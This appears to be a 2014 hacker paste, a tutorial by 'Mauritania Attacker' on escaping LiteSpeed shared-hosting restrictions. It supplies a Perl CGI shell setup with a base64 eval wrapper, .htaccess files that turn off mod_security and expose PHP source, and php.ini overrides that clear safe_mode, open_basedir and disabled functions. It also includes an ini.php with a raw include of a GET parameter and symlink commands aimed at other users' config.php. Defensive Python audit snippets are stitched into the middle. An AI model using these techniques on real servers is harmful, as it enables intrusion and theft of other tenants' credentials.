1337_Brain

Bypass Litespeed 2014

Jun 25th, 2014
Hello all, many people are asking me how to bypass LiteSpeed servers in 2014!?

Well, actually there is no bypass available, but I found a simple way to bypass safe mode & symlink on any LiteSpeed server in 2014.

And I realized that most of the hackers and security researchers who are making tutorial videos online are just liars, because they just show an old bypass, but they do not show us the kernel version, year and PHP version xD !!! This really sucks -_-

Let's start :)

The first thing you must know is that security is very strong on most 2014 (LiteSpeed) servers \!/

So we should be able to run some commands on the server, forget PHP scripts xD !! So when you see "bypass litespeed 2014 PHP scripts", just ignore it ;) Some hackers are just talking like eating spaghetti °_° they do not even know how a server works -_-

Here are the solutions to bypass safe mode & symlink:

SAFEMODE :

1- Use a Python or Perl script so you can run commands correctly 100%

*Simple Perl Shell + .htaccess

Rename the Perl shell to ===> shell.root

If you get an internal server error, try to encode your Perl shell code with

MIME::Base64;
eval(decode_base64('CODE''));

.htaccess CODE to run the Perl shell :

Options FollowSymLinks MultiViews Indexes ExecCGI

AddType application/x-httpd-cgi .root
AddType application/x-httpd-cgi .root

AddHandler mod_perl .sh
AddHandler mod_perl .sh

AddHandler cgi-script .root
AddHandler cgi-script .root

We can also use a php.ini file :

Safe_mode = OFF
Safe_mode_gid = OFF
Disable_Functions = NONE
Open_basedir = OFF
suhosin.executor.func.blacklist = NONE

Let's take an example of a LiteSpeed server in 2014 !

INFOS :

Server software: LiteSpeed
PHP : 5.3.28
Disabled PHP Functions: passthru,system,proc_open,popen,ulti_exec,show_source,eval,symlink
Open base dir: /home/user:/usr/lib/php:/usr/php4/lib/php:/usr/local/lib/php:/usr/local/php4/lib/php:/tmp
Safe mode exec dir: /usr/local/php/bin

*PHP

If you understand PHP very well, I'm sure you will not have any problem bypassing any server thanks to the PHP version, as I explained in 2009:

PHP <======> Open base_dir

PHP also = BUG xD !

Disabled PHP functions: these can be bypassed easily, which just helps us do more with functions :) As we can see in the example, some PHP functions are disabled: passthru,system,proc_open,popen,ulti_exec,show_source,eval,symlink

Solution to bypass PHP functions :

.HTACCESS CODE :

<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
SecFilterCheckURLEncoding Off
SecFilterCheckCookieFormat Off
SecFilterCheckUnicodeEncoding Off
SecFilterNormalizeCookies Off
</IfModule>
<Limit GET POST>
order deny,allow
deny from all
allow from all
</Limit>
<Limit PUT DELETE>
order deny,allow
deny from all
</Limit>
SetEnv PHPRC /home/user/public_html/test/php.ini

and

PHP.INI CODE again :

Safe_mode = OFF
Safe_mode_gid = OFF
Disable_Functions = NONE
Open_basedir = OFF
suhosin.executor.func.blacklist = NONE

Another thing which can help us bypass open_basedir is an ini.php file :

CODE INI.PHP :

<?
echo ini_get(“safe_mode”);
echo ini_get(“open_basedir”);
include($_GET["file"]);
ini_restore(“safe_mode”);
ini_restore(“open_basedir”);
echo ini_get(“safe_mode”);
echo ini_get(“open_basedir”);
include($_GET["ss"]);
?>

And when you try to retrieve any file, don't forget to change the extension to something other than .txt, like .shtml, .log, .ini, etc.

OK, we are done with safe mode, now let's talk about bypassing symlink :

I will write some .htaccess files that can bypass reading files after symlink :

htaccess1:
Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any

htaccess2:
<Files *.php>
ForceType application/x-httpd-php4
</Files>

htaccess3:
OPTIONS Indexes FollowSymLinks SymLinksIfOwnerMatch Includes IncludesNOEXEC ExecCGI
Options Indexes FollowSymLinks
ForceType text/plain
AddType text/plain .php
AddType text/plain .html
AddType text/html .shtml
AddType txt .php
Options All
Options All
<Files *.php>
ForceType application/x-httpd-php4
</Files>

If you want to bypass Forbidden, it's easy with just this .htaccess code :

DirectoryIndex config.txt
HeaderName config.txt
ReadmeName config.txt
footerName config.txt

Options all
ForceType text/plain
AddType text/plain .php
AddType text/plain .html
AddHandler server-parsed .php
AddHandler txt .php

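Seen from the hosting side, every .htaccess and php.ini listed up to this point only works if the server honours tenant-writable override files, so those files are worth auditing. The sketch below is an added example, not part of the original paste: the rule ids, the `audit` function and both sample files are constructed for illustration, and the patterns cover only directives that appear in this paste.

```python
import re

# (rule id, pattern) pairs built from the directives this paste relies on.
HTACCESS_RULES = [
    # arbitrary extensions mapped to CGI / Perl execution
    ("cgi-handler-remap", re.compile(r"^\s*AddHandler\s+(cgi-script|mod_perl)\b", re.I)),
    ("cgi-type-remap", re.compile(r"^\s*AddType\s+application/x-httpd-cgi\b", re.I)),
    # Options that switch on CGI execution or symlink following ("-Opt" is ignored)
    ("exec-or-symlink-options",
     re.compile(r"^\s*Options\b.*(?<![-\w])(ExecCGI|FollowSymLinks|All)\b", re.I)),
    # PHP pointed at a tenant-supplied php.ini
    ("phprc-override", re.compile(r"^\s*SetEnv\s+PHPRC\b", re.I)),
    # request filtering switched off from inside the docroot
    ("waf-disabled", re.compile(r"^\s*SecFilterEngine\s+Off\b", re.I)),
    # PHP source returned as plain text instead of being executed
    ("php-served-as-text",
     re.compile(r"^\s*(ForceType\s+text/plain\b|AddType\s+text/plain\s.*\.php\b)", re.I)),
    # directory-listing header/footer files, which can be symlinks
    ("index-decoration", re.compile(r"^\s*(HeaderName|ReadmeName|FooterName)\b", re.I)),
]
PHP_INI_RULES = [
    ("restriction-disabled",
     re.compile(r"^\s*(safe_mode(_gid)?|open_basedir)\s*=\s*off\b", re.I)),
    ("blacklist-cleared",
     re.compile(r"^\s*(disable_functions|suhosin\.executor\.func\.blacklist)\s*=\s*none\b", re.I)),
]

def audit(filename, text):
    """Return [(line_no, rule_id), ...] for one tenant-writable config file."""
    rules = PHP_INI_RULES if filename.lower().endswith(".ini") else HTACCESS_RULES
    findings = []
    for line_no, line in enumerate(text.splitlines(), 1):
        if line.lstrip().startswith(("#", ";")):  # skip comment lines
            continue
        findings.extend((line_no, rid) for rid, pat in rules if pat.search(line))
    return findings

# Constructed samples (not captured from a real host).
SAMPLE_HTACCESS = """# constructed sample
Options FollowSymLinks MultiViews Indexes ExecCGI
AddHandler cgi-script .root
SetEnv PHPRC /home/user/public_html/test/php.ini
AddType text/plain .php
AddType text/plain .html
Options -ExecCGI
"""
SAMPLE_PHP_INI = "; constructed sample\nSafe_mode = OFF\nDisable_Functions = NONE\nopen_basedir = /home/user:/tmp\n"

if __name__ == "__main__":
    for name, text in ((".htaccess", SAMPLE_HTACCESS), ("php.ini", SAMPLE_PHP_INI)):
        for line_no, rule in audit(name, text):
            print(f"{name}:{line_no}: {rule}")
```

On Apache-compatible servers the findings map onto `AllowOverride` classes: `Options`, `FileInfo` (AddHandler, AddType, ForceType, SetEnv) and `Indexes` (HeaderName, ReadmeName), so withholding those classes from tenant directories makes the server ignore the corresponding lines.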

You can also try to bypass Forbidden from a Perl shell :)

These commands, for example :

ln -s /home/user/public_html/config.php HEADER
ln -s /home/user/public_html/config.php README
ln -s /home/user/public_html/config.php FOOTER

This one is the same as bypassing file reading with the previous .htaccess, but better from a Perl shell :)

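The symlink trick above leaves an artifact that is easy to find on disk: a link inside one account's web root whose target resolves into another account's files. The following check is an added example, not part of the original paste; `find_escaping_symlinks`, `demo` and the two-tenant directory layout are constructed for illustration.

```python
import os
import tempfile

def find_escaping_symlinks(webroot, allowed_root):
    """Return sorted (link_path, resolved_target) pairs for symlinks under
    webroot whose target resolves outside allowed_root (the account's home)."""
    allowed = os.path.realpath(allowed_root)
    hits = []
    # followlinks=False: report links, never walk through them
    for dirpath, dirnames, filenames in os.walk(webroot, followlinks=False):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            if not os.path.islink(path):
                continue
            target = os.path.realpath(path)
            if os.path.commonpath([allowed, target]) != allowed:
                hits.append((path, target))
    return sorted(hits)

def demo():
    """Build a constructed two-tenant tree and return the flagged links as
    (link name, target relative to the temporary base directory)."""
    with tempfile.TemporaryDirectory() as base:
        a_home = os.path.join(base, "home", "usera")
        a_web = os.path.join(a_home, "public_html")
        b_web = os.path.join(base, "home", "userb", "public_html")
        os.makedirs(a_web)
        os.makedirs(b_web)
        other_config = os.path.join(b_web, "config.php")
        own_file = os.path.join(a_web, "own.txt")
        for path in (other_config, own_file):
            open(path, "w").close()
        os.symlink(other_config, os.path.join(a_web, "HEADER"))  # crosses accounts
        os.symlink(own_file, os.path.join(a_web, "alias.txt"))   # stays in-home
        real_base = os.path.realpath(base)
        return [(os.path.basename(link), os.path.relpath(target, real_base))
                for link, target in find_escaping_symlinks(a_web, a_home)]

if __name__ == "__main__":
    for name, target in demo():
        print(f"{name} -> {target}")
```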

Sometimes you can also bypass reading files with the old gold method, the virtual .shtml file read ^_^

Create an .shtml file like "include.shtml"; ghost.ini is the name of the file you retrieved ^_^

file CODE :
<!--#include virtual="ghost.ini" -->

or the php RewriteEngine method for a virtual file

.htaccess virtual CODE :

RewriteEngine on
RewriteRule ^new.gh0st config.txt

These were just a few infos about LiteSpeed server security

If you have any problem, PM me here : https://www.facebook.com/invincible.man.393 (new account)

Sorry for my bad English :p , I hate school :p xD !!!

Thanks ^_^

./Mauritania Attacker